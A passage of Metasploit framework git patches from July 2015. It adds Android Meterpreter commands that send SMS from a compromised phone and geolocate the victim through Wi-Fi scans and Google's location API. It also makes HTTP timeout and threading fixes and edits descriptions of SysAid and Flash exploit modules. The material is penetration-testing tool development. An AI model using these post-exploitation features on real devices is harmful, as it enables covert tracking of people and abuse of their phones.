 3 files changed, 150 insertions(+), 4 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index e36a27eb31..77d9901efd 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -44,7 +44,7 @@ class Android < Extension
   def dump_sms
     sms = Array.new
     request = Packet.create_request('dump_sms')
-    response = client.send_request(request)
+    response = client.send_request(request,60)
 
     response.each( TLV_TYPE_SMS_GROUP ) { |p|
 
@@ -64,7 +64,7 @@ class Android < Extension
   def dump_contacts
     contacts = Array.new
     request = Packet.create_request('dump_contacts')
-    response = client.send_request(request)
+    response = client.send_request(request,60)
 
     response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
 
@@ -119,6 +119,40 @@ class Android < Extension
     response = client.send_request(request)
     response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
+
+  def send_sms(dest,body)
+    request = Packet.create_request('send_sms')
+    request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
+    request.add_tlv(TLV_TYPE_SMS_BODY,body)
+    response = client.send_request(request)
+    resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
+    return resp
+  end
+
+  def wlan_geolocate
+    request = Packet.create_request('wlan_geolocate')
+    response = client.send_request(request,60)
+    networks=[]
+    response.each( TLV_TYPE_WLAN_GROUP ) { |p|
+
+      networks <<
+      {
+        'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value),
+        'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value),
+        'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value)
+      }
+
+    }
+    return networks
+#    response.get_tlv(TLV_TYPE_WLAN_STRING).value
+#    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
+#	    wifi << {
+#		    'string' => p.get_tlv(TLV_TYPE_WLAN_STRING).value
+#	    }
+#    }
+#    return wifi
+#    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
+  end
 end
 
 end
diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb
index 879afbe944..37232b9bbf 100644
--- a/lib/rex/post/meterpreter/extensions/android/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb
@@ -33,6 +33,13 @@ TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
 
 TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
 
+TLV_TYPE_SMS_SENT   = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9021)
+
+TLV_TYPE_WLAN_GROUP   = TLV_META_TYPE_GROUP      | (TLV_EXTENSIONS + 9022)
+TLV_TYPE_WLAN_BSSID   = TLV_META_TYPE_STRING      | (TLV_EXTENSIONS + 9023)
+TLV_TYPE_WLAN_SSID   = TLV_META_TYPE_STRING      | (TLV_EXTENSIONS + 9024)
+TLV_TYPE_WLAN_LEVEL   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9025)
+
 end
 end
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index a31638bc61..a71addd84a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -26,7 +26,9 @@ class Console::CommandDispatcher::Android
       'geolocate'         => 'Get current lat-long using geolocation',
       'dump_calllog'      => 'Get call log',
       'check_root'        => 'Check if device is rooted',
-      'device_shutdown'   => 'Shutdown device'
+      'device_shutdown'   => 'Shutdown device',
+      'send_sms'	  => 'Sends SMS from target session',
+      'wlan_geolocate'    => 'Get current lat-long using WLAN information',
     }
 
     reqs = {
@@ -35,7 +37,9 @@ class Console::CommandDispatcher::Android
       'geolocate'       => [ 'geolocate' ],
       'dump_calllog'    => [ 'dump_calllog' ],
       'check_root'      => [ 'check_root' ],
-      'device_shutdown' => [ 'device_shutdown']
+      'device_shutdown' => [ 'device_shutdown'],
+      'send_sms'	=> [ 'send_sms' ],
+      'wlan_geolocate'	=> [ 'wlan_geolocate' ]
     }
 
     # Ensure any requirements of the command are met
@@ -343,6 +347,7 @@ class Console::CommandDispatcher::Android
   end
 
 
+
   def cmd_check_root(*args)
 
     check_root_opts = Rex::Parser::Arguments.new(
@@ -368,6 +373,106 @@ class Console::CommandDispatcher::Android
     end
   end
 
+  def cmd_send_sms(*args)
+    send_sms_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ],
+      '-d' => [ true, 'Destination number' ],
+      '-t' => [ true, 'SMS body text' ]
+    )
+    dest=''
+    body=''
+    send_sms_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: send_sms -d <number> -t <sms body>')
+        print_line('Sends SMS messages to specified number.')
+        print_line(send_sms_opts.usage)
+        return
+      when '-d'
+	dest=val
+      when '-t'
+	body=val
+      end
+    }
+    if (dest.blank? or body.blank?)
+        print_error("You must enter both a destination address -d and the SMS text body -t")
+	print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."')
+        print_line(send_sms_opts.usage)
+	return
+    end
+    sent=client.android.send_sms(dest,body)
+    if (sent)
+        print_good('SMS sent')
+    else
+        print_status('SMS failed to send')
+    end
+  end
+
+  def cmd_wlan_geolocate(*args)
+
+    wlan_geolocate_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ]
+    )
+
+    wlan_geolocate_opts.parse(args) { | opt, idx, val |
+      case opt
+      when '-h'
+        print_line('Usage: wlan_geolocate')
+        print_line('Tries to get device geolocation from WLAN information and Google\'s API')
+        print_line(wlan_geolocate_opts.usage)
+        return
+      end
+    }
+
+    log = client.android.wlan_geolocate
+    wlan_list=''
+    log.each{|x|
+	mac=x['bssid']
+	ssid=x['ssid']
+	ss=x['level']
+	network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
+	wlan_list << network_data
+#	print_status(x['ssid']+" ("+x['bssid']+") pwr: "+x['level'].to_s())
+    }
+
+    if wlan_list.blank?
+      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
+      return
+    end
+
+    # Build and send the request to Google
+    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
+    uri = URI.parse(URI.encode(url))
+    request = Net::HTTP::Get.new(uri.request_uri)
+    http = Net::HTTP::new(uri.host,uri.port)
+    http.use_ssl = true
+    response = http.request(request)
+
+    # Gather the required information from the response
+    if response && response.code == '200'
+      results = JSON.parse(response.body)
+      latitude =  results["location"]["lat"]
+      longitude = results["location"]["lng"]
+      accuracy = results["accuracy"]
+      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
+      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
+    else
+      print_error("Failure connecting to Google for location lookup.")
+    end
+
+#    print_status(log)
+#    log.each{|x|
+#	print_line(x)
+#    }
+    #if is_rooted
+    #  print_good('Device is rooted')
+    #elsif
+    #  print_status('Device is not rooted')
+    #end
+  end
+
+
+
   #
   # Name for this dispatcher
   #

From 97f4ec72f996019377d774dcee375770dd4c4160 Mon Sep 17 00:00:00 2001
From: Jack64 <somethingsyouneverforget@gmail.com>
Date: Mon, 20 Jul 2015 01:20:36 +0100
Subject: [PATCH 0830/1013] minor fixes

---
 .../post/meterpreter/extensions/android/android.rb |  8 --------
 .../ui/console/command_dispatcher/android.rb       | 14 ++------------
 2 files changed, 2 insertions(+), 20 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 77d9901efd..ad565c172f 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -144,14 +144,6 @@ class Android < Extension
 
     }
     return networks
-#    response.get_tlv(TLV_TYPE_WLAN_STRING).value
-#    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
-#	    wifi << {
-#		    'string' => p.get_tlv(TLV_TYPE_WLAN_STRING).value
-#	    }
-#    }
-#    return wifi
-#    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
   end
 end
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index a71addd84a..647199040e 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -422,8 +422,8 @@ class Console::CommandDispatcher::Android
         print_line(wlan_geolocate_opts.usage)
         return
       end
-    }
-
+    
+    print_status('Waiting for WiFi scan results...')
     log = client.android.wlan_geolocate
     wlan_list=''
     log.each{|x|
@@ -432,7 +432,6 @@ class Console::CommandDispatcher::Android
 	ss=x['level']
 	network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
 	wlan_list << network_data
-#	print_status(x['ssid']+" ("+x['bssid']+") pwr: "+x['level'].to_s())
     }
 
     if wlan_list.blank?
@@ -460,15 +459,6 @@ class Console::CommandDispatcher::Android
       print_error("Failure connecting to Google for location lookup.")
     end
 
-#    print_status(log)
-#    log.each{|x|
-#	print_line(x)
-#    }
-    #if is_rooted
-    #  print_good('Device is rooted')
-    #elsif
-    #  print_status('Device is not rooted')
-    #end
   end
 
 

From 0771d5ec3940a31acc0ec7e4fe9181d4f3350db1 Mon Sep 17 00:00:00 2001
From: Jack64 <somethingsyouneverforget@gmail.com>
Date: Mon, 20 Jul 2015 01:22:45 +0100
Subject: [PATCH 0831/1013] minor fixes

---
 lib/rex/post/meterpreter/extensions/android/android.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index ad565c172f..97a9614388 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -44,7 +44,7 @@ class Android < Extension
   def dump_sms
     sms = Array.new
     request = Packet.create_request('dump_sms')
-    response = client.send_request(request,60)
+    response = client.send_request(request)
 
     response.each( TLV_TYPE_SMS_GROUP ) { |p|
 
@@ -64,7 +64,7 @@ class Android < Extension
   def dump_contacts
     contacts = Array.new
     request = Packet.create_request('dump_contacts')
-    response = client.send_request(request,60)
+    response = client.send_request(request)
 
     response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
 
@@ -131,7 +131,7 @@ class Android < Extension
 
   def wlan_geolocate
     request = Packet.create_request('wlan_geolocate')
-    response = client.send_request(request,60)
+    response = client.send_request(request,45)
     networks=[]
     response.each( TLV_TYPE_WLAN_GROUP ) { |p|
 

From 1a9664fcbacb29a843ba1f1aca184c612eb01d86 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 20 Jul 2015 09:54:51 -0500
Subject: [PATCH 0832/1013] Delete default option

---
 lib/msf/core/exploit/http/client.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index f9a57f7f49..d01107f91e 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -53,7 +53,7 @@ module Exploit::Remote::HttpClient
         OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),
         OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
         OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
-        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout', 20])
+        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout'])
       ], self.class
     )
 

From 035c0a8a3883363c9609e08add221b0397f1e41d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 20 Jul 2015 11:27:48 -0500
Subject: [PATCH 0833/1013] Fix #5078 by improving actual_timeout calculation

---
 lib/msf/core/exploit/http/client.rb | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index d01107f91e..83eaedff66 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -308,7 +308,12 @@ module Exploit::Remote::HttpClient
   # Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw.
   #
   def send_request_raw(opts={}, timeout = 20)
-    actual_timeout = datastore['HttpClientTimeout'] || opts[:timeout] || timeout
+    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
+      actual_timeout = datastore['HttpClientTimeout']
+    else
+      actual_timeout =  opts[:timeout] || timeout
+    end
+
     begin
       c = connect(opts)
       r = c.request_raw(opts)
@@ -325,7 +330,12 @@ module Exploit::Remote::HttpClient
   # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
   #
   def send_request_cgi(opts={}, timeout = 20)
-    actual_timeout = datastore['HttpClientTimeout'] || opts[:timeout] || timeout
+    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
+      actual_timeout = datastore['HttpClientTimeout']
+    else
+      actual_timeout =  opts[:timeout] || timeout
+    end
+
     begin
       c = connect(opts)
       r = c.request_cgi(opts)
@@ -344,7 +354,12 @@ module Exploit::Remote::HttpClient
   #   will contain the full URI.
   #
   def send_request_cgi!(opts={}, timeout = 20, redirect_depth = 1)
-    actual_timeout = datastore['HttpClientTimeout'] || opts[:timeout] || timeout
+    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
+      actual_timeout = datastore['HttpClientTimeout']
+    else
+      actual_timeout =  opts[:timeout] || timeout
+    end
+
     res = send_request_cgi(opts, actual_timeout)
     return res unless res && res.redirect? && redirect_depth > 0
 

From a59fa059dc7067c32c80f0d8e7531f32272ac41e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 20 Jul 2015 16:09:13 -0500
Subject: [PATCH 0834/1013] Fix #5675 Synchronize access to stop_handler

---
 lib/msf/core/exploit_driver.rb | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit_driver.rb b/lib/msf/core/exploit_driver.rb
index be273d10df..66e8f9e4e8 100644
--- a/lib/msf/core/exploit_driver.rb
+++ b/lib/msf/core/exploit_driver.rb
@@ -22,6 +22,7 @@ class ExploitDriver
     self.use_job                = false
     self.job_id                 = nil
     self.force_wait_for_session = false
+    self.semaphore              = Mutex.new
   end
 
   #
@@ -181,6 +182,9 @@ class ExploitDriver
   attr_accessor :force_wait_for_session # :nodoc:
   attr_accessor :session # :nodoc:
 
+  # To synchronize threads cleaning up the exploit and the handler
+  attr_accessor :semaphore
+
 protected
 
 
@@ -318,12 +322,12 @@ protected
     exploit, payload = ctx
 
     # Ensure that, no matter what, clean up of the handler occurs
-    payload.stop_handler
+    semaphore.synchronize { payload.stop_handler }
 
     exploit.framework.events.on_module_complete(exploit)
 
     # Allow the exploit to cleanup after itself, that messy bugger.
-    exploit.cleanup
+    semaphore.synchronize { exploit.cleanup }
   end
 
 end

From 4cacbcc4f724111023dc1be91861bfb74e01c15c Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 20 Jul 2015 16:19:21 -0500
Subject: [PATCH 0835/1013] Minor fixups on sysaid modules

Edited modules/auxiliary/admin/http/sysaid_file_download.rb first landed
in #5472, @pedrib's module for SysAid CVE-2015-2996 and CVE-2015-2997

Edited modules/auxiliary/admin/http/sysaid_sql_creds.rb first landed in
---
 .../auxiliary/admin/http/sysaid_file_download.rb   | 14 ++++++++------
 modules/auxiliary/admin/http/sysaid_sql_creds.rb   |  2 +-
 2 files changed, 9 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb
index 42f76e694e..1add8ee9b2 100644
--- a/modules/auxiliary/admin/http/sysaid_file_download.rb
+++ b/modules/auxiliary/admin/http/sysaid_file_download.rb
@@ -15,13 +15,15 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'SysAid Help Desk Arbitrary File Download',
       'Description' => %q{
         This module exploits two vulnerabilities in SysAid Help Desk that allows
-        an unauthenticated user to download arbitrary files from the system. First an
+        an unauthenticated user to download arbitrary files from the system. First, an
         information disclosure vulnerability (CVE-2015-2997) is used to obtain the file
         system path, and then we abuse a directory traversal (CVE-2015-2996) to download
-        the file. Note that there are some limitations on Windows: 1) the information
-        disclosure vulnerability doesn't work; 2) we can only traverse the current drive,
-        so if you enter C:\afile.txt and the server is running on D:\ the file will not
-        be downloaded. This module has been tested with SysAid 14.4 on Windows and Linux.
+        the file. Note that there are some limitations on Windows, in that the information
+        disclosure vulnerability doesn't work on a Windows platform, and we can only
+        traverse the current drive (if you enter C:\afile.txt and the server is running
+        on D:\ the file will not be downloaded).
+
+        This module has been tested with SysAid 14.4 on Windows and Linux.
         },
       'Author' =>
         [
@@ -74,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
-  def download_file (download_path)
+  def download_file(download_path)
     begin
       return send_request_cgi({
         'method' => 'GET',
diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
index 4524bea383..b2ccb89657 100644
--- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb
+++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
         This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated
         user to download arbitrary files from the system. This is used to download the server
         configuration file that contains the database username and password, which is encrypted
-        with a fixed key. This module has been tested with SysAid 14.4 on Windows and Linux.
+        with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.
         },
       'Author' =>
         [

From ab6204ca2e2abb548027471ff0af44054032c281 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 20 Jul 2015 16:21:50 -0500
Subject: [PATCH 0836/1013] Correct spelling of sysaid module

First landed in #5473.
---
 ...sysaid_rdslogs_fle_upload.rb => sysaid_rdslogs_file_upload.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/exploits/multi/http/{sysaid_rdslogs_fle_upload.rb => sysaid_rdslogs_file_upload.rb} (100%)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
similarity index 100%
rename from modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
rename to modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb

From f94fe3cefd7b32985f1e0c8a6b69ff365a713a1c Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 20 Jul 2015 16:23:29 -0500
Subject: [PATCH 0837/1013] More correct URL, not just a bare wiki link

Edited modules/auxiliary/server/browser_autopwn2.rb first landed in
---
 modules/auxiliary/server/browser_autopwn2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index 382e6007e9..8dbce4374f 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
       'DisclosureDate' => "Jul 5 2015",
       'References'     =>
         [
-          [ 'URL', 'https://github.com/rapid7/metasploit-framework/wiki' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2' ]
         ],
       'Actions'     =>
         [

From f7c11d085283ae58fc094340084e51cb26c1a94f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 20 Jul 2015 16:29:49 -0500
Subject: [PATCH 0838/1013] More cleanups

Edited modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
first landed in #5678, adobe_flash_hacking_team_uaf.rb

Edited
modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
first landed in #5698, Adobe Flash CVE-2015-5122 opaqueBackground

Edited modules/exploits/multi/http/sysaid_auth_file_upload.rb first
landed in #5471, @pedrib's module for SysAid CVE-2015-2994

Edited modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb first
landed in #5473 Correct spelling of sysaid module
---
 .../exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 2 +-
 .../multi/browser/adobe_flash_opaque_background_uaf.rb     | 2 +-
 modules/exploits/multi/http/sysaid_auth_file_upload.rb     | 7 ++++---
 modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb  | 4 ++--
 4 files changed, 8 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 72a08ae5dc..445567be76 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'                => 'Adobe Flash Player ByteArray Use After Free',
       'Description'         => %q{
         This module exploits an use after free on Adobe Flash Player. The vulnerability,
-        discovered by Hacking Team and made public on its July 2015 data leak, was
+        discovered by Hacking Team and made public as part of the July 2015 data leak, was
         described as an Use After Free while handling ByteArray objects. This module has
         been tested successfully on:
 
diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 7283dcea8a..3389892337 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'                => 'Adobe Flash opaqueBackground Use After Free',
       'Description'         => %q{
         This module exploits an use after free on Adobe Flash Player. The vulnerability,
-        discovered by Hacking Team and made public on its July 2015 data leak, was
+        discovered by Hacking Team and made public in its July 2015 data leak, was
         described as an Use After Free while handling the opaqueBackground property
         7 setter of the flash.display.DisplayObject class. This module is an early release
         tested on:
diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
index 531866c887..d70066fc28 100644
--- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb
@@ -18,9 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description' => %q{
         This module exploits a file upload vulnerability in SysAid Help Desk.
         The vulnerability exists in the ChangePhoto.jsp in the administrator portal,
-        which does not handle correctly directory traversal sequences and does not
-        enforce file extension restrictions. You need to have an administrator account,
-        but there is a Metasploit auxiliary module that can create one for you.
+        which does not correctly handle directory traversal sequences and does not
+        enforce file extension restrictions. While an attacker needs an administrator
+        account in order to leverage this vulnerability, there is a related Metasploit
+        auxiliary module which can create this account under some circumstances.
         This module has been tested in SysAid v14.4 in both Linux and Windows.
       },
       'Author'       =>
diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
index 7e3a02f8de..a149e41dbd 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description' => %q{
         This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
         The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
-        file uploads and handles zip file contents in a insecure way. Combining both weaknesses
+        file uploads and handles zip file contents in a insecure way. By combinding both weaknesses,
         a remote attacker can accomplish remote code execution. Note that this will only work if the
-        target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection
+        target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection
         against null byte injection in file names. This module has been tested successfully on version
         v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid
         seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability

From 2052b4ef5693b234d5caacd19ac512c4a8c44467 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 20 Jul 2015 16:36:47 -0500
Subject: [PATCH 0839/1013] Fixed the HT leak attribution a little

---
 .../exploits/multi/browser/adobe_flash_opaque_background_uaf.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 3389892337..bb4886ba44 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'                => 'Adobe Flash opaqueBackground Use After Free',
       'Description'         => %q{
         This module exploits an use after free on Adobe Flash Player. The vulnerability,
-        discovered by Hacking Team and made public in its July 2015 data leak, was
+        discovered by Hacking Team and made public as part of the July 2015 data leak, was
         described as an Use After Free while handling the opaqueBackground property
         7 setter of the flash.display.DisplayObject class. This module is an early release
         tested on:

From cadb03bac00a8e647ffb29b435e65ba5683387e7 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Mon, 20 Jul 2015 17:14:13 -0500
Subject: [PATCH 0840/1013] Fix my own blasted typo, ty @wvu-r7

---
 modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
index a149e41dbd..93924c5d04 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description' => %q{
         This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
         The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
-        file uploads and handles zip file contents in a insecure way. By combinding both weaknesses,
+        file uploads and handles zip file contents in a insecure way. By combining both weaknesses,
         a remote attacker can accomplish remote code execution. Note that this will only work if the
         target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection
         against null byte injection in file names. This module has been tested successfully on version

From 1e17ac4ec738725bb96d52581a3f3f599bf6fe88 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Mon, 20 Jul 2015 18:40:48 -0500
Subject: [PATCH 0841/1013] Use the cred API correctly

---
 .../scanner/smb/smb_enumusers_domain.rb       | 73 ++++++++++++-------
 1 file changed, 46 insertions(+), 27 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
index e86382a9d8..e8775e681f 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
@@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'        => 'SMB Domain User Enumeration',
-      'Version'     => '$Revision $',
       'Description' => 'Determine what domain users are logged into a remote system via a DCERPC to NetWkstaUserEnum.',
       'Author'      =>
         [
@@ -46,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
     idx += 4
     val_actual = resp[idx,4].unpack("V")[0]
     idx += 4
-    value	= resp[idx,val_actual*2]
+    value = resp[idx,val_actual*2]
     idx += val_actual * 2
 
     idx += val_actual % 2 * 2 # alignment
@@ -54,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
     return value,idx
   end
 
-  def parse_NetWkstaEnumUsersInfo(resp)
+  def parse_net_wksta_enum_users_info(resp)
     accounts = [ Hash.new() ]
 
     idx = 20
@@ -72,10 +71,10 @@ class Metasploit3 < Msf::Auxiliary
     1.upto(count) do
       # wkssvc_NetWkstaEnumUsersInfo -> Info -> PtrCt0 -> User() -> Ptr -> ID1 max count
 
-      account_name,idx	= parse_value(resp, idx)
-      logon_domain,idx	= parse_value(resp, idx)
-      other_domains,idx	= parse_value(resp, idx)
-      logon_server,idx	= parse_value(resp, idx)
+      account_name,idx  = parse_value(resp, idx)
+      logon_domain,idx  = parse_value(resp, idx)
+      other_domains,idx = parse_value(resp, idx)
+      logon_server,idx  = parse_value(resp, idx)
 
       accounts << {
         :account_name => account_name,
@@ -96,6 +95,35 @@ class Metasploit3 < Msf::Auxiliary
     @smbdirect || datastore['SMBDirect']
   end
 
+  def store_username(username, res, ip, rport)
+    service_data = {
+      address: ip,
+      port: rport,
